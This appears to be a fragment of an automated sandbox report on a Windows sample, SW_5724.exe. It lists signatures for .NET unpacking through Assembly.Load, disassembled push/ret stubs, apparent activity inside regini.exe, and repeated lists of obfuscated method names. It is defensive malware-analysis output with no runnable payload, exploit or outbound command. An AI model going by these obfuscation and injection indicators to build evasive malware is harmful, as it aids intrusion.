                Source: Binary string: regini.pdbGCTL source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000003.2595517086.0000000000F2B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000003.2595517086.0000000000F2B000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, ihdZojCtJ78sVpQg9k.cs.Net Code: tAXFeekI1V System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, ihdZojCtJ78sVpQg9k.cs.Net Code: tAXFeekI1V System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_5724.exe.7770000.5.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, ihdZojCtJ78sVpQg9k.cs.Net Code: tAXFeekI1V System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_5724.exe.41f1d80.2.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00414774 push esp; retf 1CE7h6_2_0041478E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00402029 push FFFFFFFBh; retf 6_2_00402032
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0041A991 push ebp; iretd 6_2_0041A992
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00403230 push eax; ret 6_2_00403232
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00411AD3 push edi; retf 6_2_00411AD4
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_004182B7 pushad ; iretd 6_2_004182B8
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0040D346 push ds; iretd 6_2_0040D347
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00412468 pushad ; iretd 6_2_0041247F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00418CCC push esp; retn 55EDh6_2_00418CD1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00412484 push 0000003Bh; retf 6_2_00412486
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0040855D push es; ret 6_2_00408560
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00418D33 pushad ; retf 6_2_00418D85
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00417F3C push edi; ret 6_2_00417F57
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00404FF0 push esi; ret 6_2_00404FF1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A2225F pushad ; ret 6_2_01A227F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A227FA pushad ; ret 6_2_01A227F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A509AD push ecx; mov dword ptr [esp], ecx6_2_01A509B6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A2283D push eax; iretd 6_2_01A22858
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A21366 push eax; iretd 6_2_01A21369
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D4225F pushad ; ret 10_2_02D427F9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D427FA pushad ; ret 10_2_02D427F9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D4283D push eax; iretd 10_2_02D42858
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D709AD push ecx; mov dword ptr [esp], ecx10_2_02D709B6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D41366 push eax; iretd 10_2_02D41369
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046E8A0 push edi; retf 10_2_0046E8A1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_00474D09 push edi; ret 10_2_00474D24
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_00475084 pushad ; iretd 10_2_00475085
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046F251 push 0000003Bh; retf 10_2_0046F253
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046F235 pushad ; iretd 10_2_0046F24C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046532A push es; ret 10_2_0046532D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047775E push ebp; iretd 10_2_0047775F
                Source: SW_5724.exeStatic PE information: section name: .text entropy: 7.776537038112395
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, XQ4rfAH8tgIOpIIMbM.csHigh entropy of concatenated method names: 'WvlEoEYWJ1', 'CgPEQb1EGa', 'EMMEHR6kaT', 'C2sE9YPFc2', 'GL5EhQX6EG', 'ynZEi0Lxhd', 'NMxExe0dNR', 's82E1fG3To', 'qbgEq7iUuT', 'F68ERENUaA'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, al9OqjR3F2XU3WFU9f.csHigh entropy of concatenated method names: 'nrH6ayFRIk', 'QU062n3pSg', 'saQ68ApaLO', 'wUH87yxTRH', 'twV8zJfKLn', 'mZg63x5YAn', 'Hhq6Xj4ZXN', 'HrL6MOJP9Y', 't2Q6j1oKLL', 'tW96FKQ2K3'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, w6KYAKbsElsudkQTTK.csHigh entropy of concatenated method names: 'QP1InnElCa', 'PUnI7kqhbT', 'U03k3MEKj0', 'BV0kX1MteM', 'yUsIGE0SZh', 'DnYIQfZCC4', 'q7vIAA4n2T', 'JWgIHLrdUk', 'lOaI96UYBU', 'eU2Iwq1P3E'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, hAhRdt2m3Cvl3vjmuC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'OXoMmFehfo', 'OoiM79uqwK', 'wlhMzObGPZ', 'fbOj3ZFSu9', 'bqUjXk5rIi', 'XFwjMSL4lt', 'mCyjjI7gJy', 'TkgO2TmyeEQvTCF3FEJ'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, Yq2m1QtdjmE3a0x74O.csHigh entropy of concatenated method names: 'P7kZYyo9Qp', 'm9gZyO7Mo8', 'V4J2ijgTUb', 'meV2xxmfRB', 'dHZ21pt7wg', 'hI22qwn0bU', 'RM52RuIKR9', 'ImG2sP9e3g', 'zor2gKY0jx', 'gL92og0ljQ'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, fNhJMjXjWO9uttmZ7Py.csHigh entropy of concatenated method names: 'QrwB7eZILJ', 't28Bzf97HE', 'jF3W3S0CMf', 'eXTqnB1kftYRiFtjLeI', 'HP65kX14ifnAgdMYoiK', 'ji0ssj1eas4qAbuwJWu', 'Rw8nxy1dAVN0cClyfja'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, PqmQ2TwitLW9sQhr8M.csHigh entropy of concatenated method names: 'ToString', 'flCcGViJsi', 'dHychsp56K', 'LfAcio9osE', 'CRjcxZXvpR', 'iL8c14tkDP', 'b1Wcq5dehi', 'bupcRWY00D', 'auPcsHG37e', 'MCycgKglS7'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, LoqNAhvJtEQUrZfqC6.csHigh entropy of concatenated method names: 'fgB2lkt1PL', 'Id12DvkhLn', 'J1X2LZDsqp', 'R732vs2a5D', 'xX92EJSeOf', 'JSd2c7vwGA', 'GkV2IYox5v', 'J4W2k3ujvd', 'TyK2fdBKhp', 'H1N2JKspVr'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, NN4ursMX2Nw5pCpBcv.csHigh entropy of concatenated method names: 'FyteRuBkM', 'AA1lumkW7', 'TqCD7tWHv', 'VS3yLsj28', 'LpQvV5CEk', 'EMstBLiBN', 'xnHon1WanBXGJVQQsa', 'FNLNZB5EcC6bfGORtw', 'pYfkJun0J', 'FPOJLwE5R'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, DxR4smX3pULWxouKFYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aZpJGWEasm', 'KlRJQa0fLM', 'BxoJA8xGe6', 'fsuJHNwFjV', 'WiyJ9asAkn', 'AdVJwDurRM', 'RlQJTNxuWR'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, fswkO0TSpPVoR1qmFt.csHigh entropy of concatenated method names: 'beqIKnDwvq', 'pdeINTd3sg', 'ToString', 'PkdIah3nbC', 'IhwI47bwJ9', 'TJdI2fnIBq', 'GqiIZvypH6', 'PrvI8VkGya', 'bqpI6QYdqu', 'xcMICndI25'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, L19nqmzkSU5NL4qKd0.csHigh entropy of concatenated method names: 'ANBJDLGE1x', 'LZtJLbpOxD', 'U24JvgTi63', 'UnuJPdGI1v', 'EwdJh7YV8r', 'NVvJxy6SFD', 'V6wJ1UBCbC', 'u48JSHxQKZ', 'zB0Jp3XGMH', 'y83JuSF8eL'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, KRVuDaPhpbrnqAKB6Q.csHigh entropy of concatenated method names: 'bgH8rvVMSE', 'AVp841YAsX', 'BjG8Z8VDEF', 'C6s86MrZ7N', 'tP08C2AtDa', 'yWOZVN4sDU', 'en7ZbWfPgE', 'dLJZdw2fWK', 'uc9ZnAxdN3', 'TMvZmOUPot'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, SX4yAxgOS6DPtc5MH9.csHigh entropy of concatenated method names: 'Jsj6pJVT9v', 'QPR6uTlfo3', 'ySH6eYypCF', 'k1x6lrd9w6', 'gDR6YsZAQ2', 'agR6DA0Smd', 'aJZ6yZp1PC', 'LGW6LtpOHG', 'SSl6v07lFa', 'zvL6tL3Nrr'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, hn1QhhAAmkVKxGLQoq.csHigh entropy of concatenated method names: 'R1NOLdq88t', 'E30OvMPyGZ', 'kOsOPbCXyf', 'x0wOhOyCyJ', 'WO5OxYG3uC', 'S9TO1i4AVH', 'rT2ORhDl49', 'AAeOsuH8fU', 'QWNOogcND2', 'riiOGSBcVE'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, qimOJmLpbCtpRP9n6S.csHigh entropy of concatenated method names: 'UCQ4HP27FH', 'l8k49aQdqS', 'xBc4wLBCOo', 'r7y4TbMANL', 'gbp4Vp0MW6', 'cB94bkmdMf', 'yRR4d1lM1U', 'CcE4nDOOpe', 'qXg4m1Tq3o', 'A9A47AuRUL'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, RmfG9oXXNDFfNbn7UZ8.csHigh entropy of concatenated method names: 'WKSJ7SOTHA', 'BlkJzcgJI8', 'PtCB3XGl73', 'p7JBX4VNIG', 'L5KBMQOdQn', 'CH7Bjr7tN8', 'hA5BFm1QYK', 'rO2BrXIUri', 'a0OBahP4Dj', 'Qh5B4tHO00'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, ihdZojCtJ78sVpQg9k.csHigh entropy of concatenated method names: 'k1Gjr0Fe6X', 'bUIja85ItZ', 'MjJj49cJg8', 'PPFj2yZy99', 'GjwjZI3rEL', 'MVVj8Xf2sn', 'fZij6rr7dC', 'VDSjCSOq4I', 'c5sj5NoAva', 'upIjKYeqsR'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, fPr9Pw7VKaJ1Bmx4pY.csHigh entropy of concatenated method names: 'U0YJ2vpoF5', 'vcaJZlgNbK', 'c3hJ86AaR6', 'hcZJ61KyHN', 'BnxJfiWdZS', 'ClFJCVELv8', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, sjDG9bdytj4KvMQl4k.csHigh entropy of concatenated method names: 'g6yfEgMdYc', 'iQafIDwusb', 'xNCff6FSkP', 'QY2fBZX8OE', 'CcrfUdgG8S', 'tkCfSbY6o1', 'Dispose', 'iuekacR5xR', 'iENk4M21sT', 'RQNk2XWip9'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, Tv9Pl4XFfTOr0rs9ixU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BkyWfUQNH5', 'btUWJwNMfL', 'wgkWBVhbag', 'A3EWW4aZWU', 'EBcWUlSIs5', 'VbaW0H9UeO', 'POqWSmphp3'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, a0tXnlFT3tegeO4j49.csHigh entropy of concatenated method names: 'cIkX6imOJm', 'ybCXCtpRP9', 'HJtXKEQUrZ', 'rqCXN67q2m', 'wx7XE4OqRV', 'yDaXchpbrn', 'Tf4Y6v2Dk46ChpZiNJ', 'hRAyMvUUXExoA11wb3', 'ikDXivPnwhDq3QsaUd', 'SQyXXQodVh'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, XwL7mf4ov2kYpvnS9P.csHigh entropy of concatenated method names: 'Dispose', 'c4KXmvMQl4', 'rRHMhcykrV', 'rjbQL0WlRh', 'qktX7HU0R9', 'FP9XzibYZn', 'ProcessDialogKey', 'EYQM3QF4cg', 'RriMXXtqWl', 'EXdMMaPr9P'
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, PQF4cgmHriXtqWlvXd.csHigh entropy of concatenated method names: 'pbEfPMmUbO', 'OMgfhaN27I', 'mKlfi2ZqUP', 'C8ffxdHmLY', 'KqSf1XD5Ru', 'aQ7fqOS6fL', 'VARfRG1AMf', 'CJ8fsB3BfV', 'hpsfgvTwj0', 'qhvfo01GmV'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, XQ4rfAH8tgIOpIIMbM.csHigh entropy of concatenated method names: 'WvlEoEYWJ1', 'CgPEQb1EGa', 'EMMEHR6kaT', 'C2sE9YPFc2', 'GL5EhQX6EG', 'ynZEi0Lxhd', 'NMxExe0dNR', 's82E1fG3To', 'qbgEq7iUuT', 'F68ERENUaA'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, al9OqjR3F2XU3WFU9f.csHigh entropy of concatenated method names: 'nrH6ayFRIk', 'QU062n3pSg', 'saQ68ApaLO', 'wUH87yxTRH', 'twV8zJfKLn', 'mZg63x5YAn', 'Hhq6Xj4ZXN', 'HrL6MOJP9Y', 't2Q6j1oKLL', 'tW96FKQ2K3'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, w6KYAKbsElsudkQTTK.csHigh entropy of concatenated method names: 'QP1InnElCa', 'PUnI7kqhbT', 'U03k3MEKj0', 'BV0kX1MteM', 'yUsIGE0SZh', 'DnYIQfZCC4', 'q7vIAA4n2T', 'JWgIHLrdUk', 'lOaI96UYBU', 'eU2Iwq1P3E'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, hAhRdt2m3Cvl3vjmuC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'OXoMmFehfo', 'OoiM79uqwK', 'wlhMzObGPZ', 'fbOj3ZFSu9', 'bqUjXk5rIi', 'XFwjMSL4lt', 'mCyjjI7gJy', 'TkgO2TmyeEQvTCF3FEJ'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, Yq2m1QtdjmE3a0x74O.csHigh entropy of concatenated method names: 'P7kZYyo9Qp', 'm9gZyO7Mo8', 'V4J2ijgTUb', 'meV2xxmfRB', 'dHZ21pt7wg', 'hI22qwn0bU', 'RM52RuIKR9', 'ImG2sP9e3g', 'zor2gKY0jx', 'gL92og0ljQ'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, fNhJMjXjWO9uttmZ7Py.csHigh entropy of concatenated method names: 'QrwB7eZILJ', 't28Bzf97HE', 'jF3W3S0CMf', 'eXTqnB1kftYRiFtjLeI', 'HP65kX14ifnAgdMYoiK', 'ji0ssj1eas4qAbuwJWu', 'Rw8nxy1dAVN0cClyfja'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, PqmQ2TwitLW9sQhr8M.csHigh entropy of concatenated method names: 'ToString', 'flCcGViJsi', 'dHychsp56K', 'LfAcio9osE', 'CRjcxZXvpR', 'iL8c14tkDP', 'b1Wcq5dehi', 'bupcRWY00D', 'auPcsHG37e', 'MCycgKglS7'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, LoqNAhvJtEQUrZfqC6.csHigh entropy of concatenated method names: 'fgB2lkt1PL', 'Id12DvkhLn', 'J1X2LZDsqp', 'R732vs2a5D', 'xX92EJSeOf', 'JSd2c7vwGA', 'GkV2IYox5v', 'J4W2k3ujvd', 'TyK2fdBKhp', 'H1N2JKspVr'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, NN4ursMX2Nw5pCpBcv.csHigh entropy of concatenated method names: 'FyteRuBkM', 'AA1lumkW7', 'TqCD7tWHv', 'VS3yLsj28', 'LpQvV5CEk', 'EMstBLiBN', 'xnHon1WanBXGJVQQsa', 'FNLNZB5EcC6bfGORtw', 'pYfkJun0J', 'FPOJLwE5R'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, DxR4smX3pULWxouKFYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aZpJGWEasm', 'KlRJQa0fLM', 'BxoJA8xGe6', 'fsuJHNwFjV', 'WiyJ9asAkn', 'AdVJwDurRM', 'RlQJTNxuWR'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, fswkO0TSpPVoR1qmFt.csHigh entropy of concatenated method names: 'beqIKnDwvq', 'pdeINTd3sg', 'ToString', 'PkdIah3nbC', 'IhwI47bwJ9', 'TJdI2fnIBq', 'GqiIZvypH6', 'PrvI8VkGya', 'bqpI6QYdqu', 'xcMICndI25'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, L19nqmzkSU5NL4qKd0.csHigh entropy of concatenated method names: 'ANBJDLGE1x', 'LZtJLbpOxD', 'U24JvgTi63', 'UnuJPdGI1v', 'EwdJh7YV8r', 'NVvJxy6SFD', 'V6wJ1UBCbC', 'u48JSHxQKZ', 'zB0Jp3XGMH', 'y83JuSF8eL'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, KRVuDaPhpbrnqAKB6Q.csHigh entropy of concatenated method names: 'bgH8rvVMSE', 'AVp841YAsX', 'BjG8Z8VDEF', 'C6s86MrZ7N', 'tP08C2AtDa', 'yWOZVN4sDU', 'en7ZbWfPgE', 'dLJZdw2fWK', 'uc9ZnAxdN3', 'TMvZmOUPot'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, SX4yAxgOS6DPtc5MH9.csHigh entropy of concatenated method names: 'Jsj6pJVT9v', 'QPR6uTlfo3', 'ySH6eYypCF', 'k1x6lrd9w6', 'gDR6YsZAQ2', 'agR6DA0Smd', 'aJZ6yZp1PC', 'LGW6LtpOHG', 'SSl6v07lFa', 'zvL6tL3Nrr'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, hn1QhhAAmkVKxGLQoq.csHigh entropy of concatenated method names: 'R1NOLdq88t', 'E30OvMPyGZ', 'kOsOPbCXyf', 'x0wOhOyCyJ', 'WO5OxYG3uC', 'S9TO1i4AVH', 'rT2ORhDl49', 'AAeOsuH8fU', 'QWNOogcND2', 'riiOGSBcVE'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, qimOJmLpbCtpRP9n6S.csHigh entropy of concatenated method names: 'UCQ4HP27FH', 'l8k49aQdqS', 'xBc4wLBCOo', 'r7y4TbMANL', 'gbp4Vp0MW6', 'cB94bkmdMf', 'yRR4d1lM1U', 'CcE4nDOOpe', 'qXg4m1Tq3o', 'A9A47AuRUL'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, RmfG9oXXNDFfNbn7UZ8.csHigh entropy of concatenated method names: 'WKSJ7SOTHA', 'BlkJzcgJI8', 'PtCB3XGl73', 'p7JBX4VNIG', 'L5KBMQOdQn', 'CH7Bjr7tN8', 'hA5BFm1QYK', 'rO2BrXIUri', 'a0OBahP4Dj', 'Qh5B4tHO00'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, ihdZojCtJ78sVpQg9k.csHigh entropy of concatenated method names: 'k1Gjr0Fe6X', 'bUIja85ItZ', 'MjJj49cJg8', 'PPFj2yZy99', 'GjwjZI3rEL', 'MVVj8Xf2sn', 'fZij6rr7dC', 'VDSjCSOq4I', 'c5sj5NoAva', 'upIjKYeqsR'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, fPr9Pw7VKaJ1Bmx4pY.csHigh entropy of concatenated method names: 'U0YJ2vpoF5', 'vcaJZlgNbK', 'c3hJ86AaR6', 'hcZJ61KyHN', 'BnxJfiWdZS', 'ClFJCVELv8', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, sjDG9bdytj4KvMQl4k.csHigh entropy of concatenated method names: 'g6yfEgMdYc', 'iQafIDwusb', 'xNCff6FSkP', 'QY2fBZX8OE', 'CcrfUdgG8S', 'tkCfSbY6o1', 'Dispose', 'iuekacR5xR', 'iENk4M21sT', 'RQNk2XWip9'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, Tv9Pl4XFfTOr0rs9ixU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BkyWfUQNH5', 'btUWJwNMfL', 'wgkWBVhbag', 'A3EWW4aZWU', 'EBcWUlSIs5', 'VbaW0H9UeO', 'POqWSmphp3'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, a0tXnlFT3tegeO4j49.csHigh entropy of concatenated method names: 'cIkX6imOJm', 'ybCXCtpRP9', 'HJtXKEQUrZ', 'rqCXN67q2m', 'wx7XE4OqRV', 'yDaXchpbrn', 'Tf4Y6v2Dk46ChpZiNJ', 'hRAyMvUUXExoA11wb3', 'ikDXivPnwhDq3QsaUd', 'SQyXXQodVh'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, XwL7mf4ov2kYpvnS9P.csHigh entropy of concatenated method names: 'Dispose', 'c4KXmvMQl4', 'rRHMhcykrV', 'rjbQL0WlRh', 'qktX7HU0R9', 'FP9XzibYZn', 'ProcessDialogKey', 'EYQM3QF4cg', 'RriMXXtqWl', 'EXdMMaPr9P'
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, PQF4cgmHriXtqWlvXd.csHigh entropy of concatenated method names: 'pbEfPMmUbO', 'OMgfhaN27I', 'mKlfi2ZqUP', 'C8ffxdHmLY', 'KqSf1XD5Ru', 'aQ7fqOS6fL', 'VARfRG1AMf', 'CJ8fsB3BfV', 'hpsfgvTwj0', 'qhvfo01GmV'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, XQ4rfAH8tgIOpIIMbM.csHigh entropy of concatenated method names: 'WvlEoEYWJ1', 'CgPEQb1EGa', 'EMMEHR6kaT', 'C2sE9YPFc2', 'GL5EhQX6EG', 'ynZEi0Lxhd', 'NMxExe0dNR', 's82E1fG3To', 'qbgEq7iUuT', 'F68ERENUaA'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, al9OqjR3F2XU3WFU9f.csHigh entropy of concatenated method names: 'nrH6ayFRIk', 'QU062n3pSg', 'saQ68ApaLO', 'wUH87yxTRH', 'twV8zJfKLn', 'mZg63x5YAn', 'Hhq6Xj4ZXN', 'HrL6MOJP9Y', 't2Q6j1oKLL', 'tW96FKQ2K3'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, w6KYAKbsElsudkQTTK.csHigh entropy of concatenated method names: 'QP1InnElCa', 'PUnI7kqhbT', 'U03k3MEKj0', 'BV0kX1MteM', 'yUsIGE0SZh', 'DnYIQfZCC4', 'q7vIAA4n2T', 'JWgIHLrdUk', 'lOaI96UYBU', 'eU2Iwq1P3E'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, hAhRdt2m3Cvl3vjmuC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'OXoMmFehfo', 'OoiM79uqwK', 'wlhMzObGPZ', 'fbOj3ZFSu9', 'bqUjXk5rIi', 'XFwjMSL4lt', 'mCyjjI7gJy', 'TkgO2TmyeEQvTCF3FEJ'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, Yq2m1QtdjmE3a0x74O.csHigh entropy of concatenated method names: 'P7kZYyo9Qp', 'm9gZyO7Mo8', 'V4J2ijgTUb', 'meV2xxmfRB', 'dHZ21pt7wg', 'hI22qwn0bU', 'RM52RuIKR9', 'ImG2sP9e3g', 'zor2gKY0jx', 'gL92og0ljQ'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, fNhJMjXjWO9uttmZ7Py.csHigh entropy of concatenated method names: 'QrwB7eZILJ', 't28Bzf97HE', 'jF3W3S0CMf', 'eXTqnB1kftYRiFtjLeI', 'HP65kX14ifnAgdMYoiK', 'ji0ssj1eas4qAbuwJWu', 'Rw8nxy1dAVN0cClyfja'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, PqmQ2TwitLW9sQhr8M.csHigh entropy of concatenated method names: 'ToString', 'flCcGViJsi', 'dHychsp56K', 'LfAcio9osE', 'CRjcxZXvpR', 'iL8c14tkDP', 'b1Wcq5dehi', 'bupcRWY00D', 'auPcsHG37e', 'MCycgKglS7'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, LoqNAhvJtEQUrZfqC6.csHigh entropy of concatenated method names: 'fgB2lkt1PL', 'Id12DvkhLn', 'J1X2LZDsqp', 'R732vs2a5D', 'xX92EJSeOf', 'JSd2c7vwGA', 'GkV2IYox5v', 'J4W2k3ujvd', 'TyK2fdBKhp', 'H1N2JKspVr'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, NN4ursMX2Nw5pCpBcv.csHigh entropy of concatenated method names: 'FyteRuBkM', 'AA1lumkW7', 'TqCD7tWHv', 'VS3yLsj28', 'LpQvV5CEk', 'EMstBLiBN', 'xnHon1WanBXGJVQQsa', 'FNLNZB5EcC6bfGORtw', 'pYfkJun0J', 'FPOJLwE5R'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, DxR4smX3pULWxouKFYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aZpJGWEasm', 'KlRJQa0fLM', 'BxoJA8xGe6', 'fsuJHNwFjV', 'WiyJ9asAkn', 'AdVJwDurRM', 'RlQJTNxuWR'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, fswkO0TSpPVoR1qmFt.csHigh entropy of concatenated method names: 'beqIKnDwvq', 'pdeINTd3sg', 'ToString', 'PkdIah3nbC', 'IhwI47bwJ9', 'TJdI2fnIBq', 'GqiIZvypH6', 'PrvI8VkGya', 'bqpI6QYdqu', 'xcMICndI25'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, L19nqmzkSU5NL4qKd0.csHigh entropy of concatenated method names: 'ANBJDLGE1x', 'LZtJLbpOxD', 'U24JvgTi63', 'UnuJPdGI1v', 'EwdJh7YV8r', 'NVvJxy6SFD', 'V6wJ1UBCbC', 'u48JSHxQKZ', 'zB0Jp3XGMH', 'y83JuSF8eL'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, KRVuDaPhpbrnqAKB6Q.csHigh entropy of concatenated method names: 'bgH8rvVMSE', 'AVp841YAsX', 'BjG8Z8VDEF', 'C6s86MrZ7N', 'tP08C2AtDa', 'yWOZVN4sDU', 'en7ZbWfPgE', 'dLJZdw2fWK', 'uc9ZnAxdN3', 'TMvZmOUPot'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, SX4yAxgOS6DPtc5MH9.csHigh entropy of concatenated method names: 'Jsj6pJVT9v', 'QPR6uTlfo3', 'ySH6eYypCF', 'k1x6lrd9w6', 'gDR6YsZAQ2', 'agR6DA0Smd', 'aJZ6yZp1PC', 'LGW6LtpOHG', 'SSl6v07lFa', 'zvL6tL3Nrr'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, hn1QhhAAmkVKxGLQoq.csHigh entropy of concatenated method names: 'R1NOLdq88t', 'E30OvMPyGZ', 'kOsOPbCXyf', 'x0wOhOyCyJ', 'WO5OxYG3uC', 'S9TO1i4AVH', 'rT2ORhDl49', 'AAeOsuH8fU', 'QWNOogcND2', 'riiOGSBcVE'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, qimOJmLpbCtpRP9n6S.csHigh entropy of concatenated method names: 'UCQ4HP27FH', 'l8k49aQdqS', 'xBc4wLBCOo', 'r7y4TbMANL', 'gbp4Vp0MW6', 'cB94bkmdMf', 'yRR4d1lM1U', 'CcE4nDOOpe', 'qXg4m1Tq3o', 'A9A47AuRUL'
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, RmfG9oXXNDFfNbn7UZ8.csHigh entropy of concatenated method names: 'WKSJ7SOTHA', 'BlkJzcgJI8', 'PtCB3XGl73', 'p7JBX4VNIG', 'L5KBMQOdQn', 'CH7Bjr7tN8', 'hA5BFm1QYK', 'rO2BrXIUri', 'a0OBahP4Dj', 'Qh5B4tHO00'
